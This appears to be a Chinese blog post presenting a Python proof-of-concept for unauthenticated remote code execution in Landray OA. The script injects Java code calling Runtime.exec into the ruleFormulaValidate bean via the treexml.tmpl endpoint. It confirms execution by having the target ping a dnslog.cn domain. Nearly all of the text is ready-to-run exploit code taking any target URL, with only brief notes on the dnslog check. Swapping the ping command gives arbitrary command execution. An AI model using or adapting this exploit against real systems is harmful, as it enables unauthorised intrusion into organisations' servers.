这里我们借助burp的辅助工具 去帮我们构造前期的请求包 只需要专注逻辑处理
这里就可以用python对这个包发起请求
好了 不废话 上正文
蓝凌未授权rce poc
import argparse
import sys
import requests
import time
import random
def random_str(n):
str = ''
for i in range(n):
str += chr(random.randint(97, 122))
return str
cookie = random_str(26)
headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:100.0) Gecko/20000101 Firefox/100.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
"Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"}
def get_domain_or_check(type):
if type == 1:
url = "http://www.dnslog.cn:80/getdomain.php"
cookies = {"PHPSESSID": cookie}
res = requests.get(url, headers=headers, cookies=cookies)
print("[+] dnslog:" + res.text)
return res.text
elif type == 2:
url = "http://dnslog.cn:80/getrecords.php?t=0.18836534176098696"
cookies = {"PHPSESSID": cookie}
time.sleep(0.8)
res = requests.get(url, headers=headers, cookies=cookies)
if len(res.text) > 2:
print("[+] Success 漏洞存在: " + res.text)
else:
print("[+] 漏洞不存在")
def test(url):
cmd = "ping " + get_domain_or_check(1)
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36",
"Connection": "close", "Accept": "*/*", "Accept-Language": "en",
"Content-Type": "application/x-www-form-urlencoded", "Pragma": "no-cache", "Accept-Encoding": "gzip, deflate"}
data = {"s_bean": "ruleFormulaValidate", "script": "try {String cmd = \"" + str(
cmd) + "\";Process process = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}"}
if url[-1] != "/":
url = url + "/data/sys-common/treexml.tmpl"
else:
url = url + "data/sys-common/treexml.tmpl"
res = requests.post(url, headers=headers, data=data)
if res.status_code == 200:
get_domain_or_check(2)
else:
print("[+] 状态码" + str(res.status_code) + " 漏洞不存在")
def parse_args():
parser = argparse.ArgumentParser(epilog="\tExample: \r\npython " + sys.argv[0] + " -u target")
parser._optionals.title = "OPTIONS"
parser.add_argument('-u', '--url', help="url.", required=True, type=str)
return parser.parse_args()
if __name__ == '__main__':
print("\033[1;32mAuthor: by567 暗\033[0m")
args = parse_args()
url = args.url
test(url)
这里分析了 dnslog的getdomain.php和getrecords.php来获取dnslog测试结果
通过getdomain.php获取测试dnslog 这里PHPSESSID设置我们构造的这样获取结果才能获取到
接着就是 发起请求 对数据包进行分析处理
代码写的比较low 大佬勿喷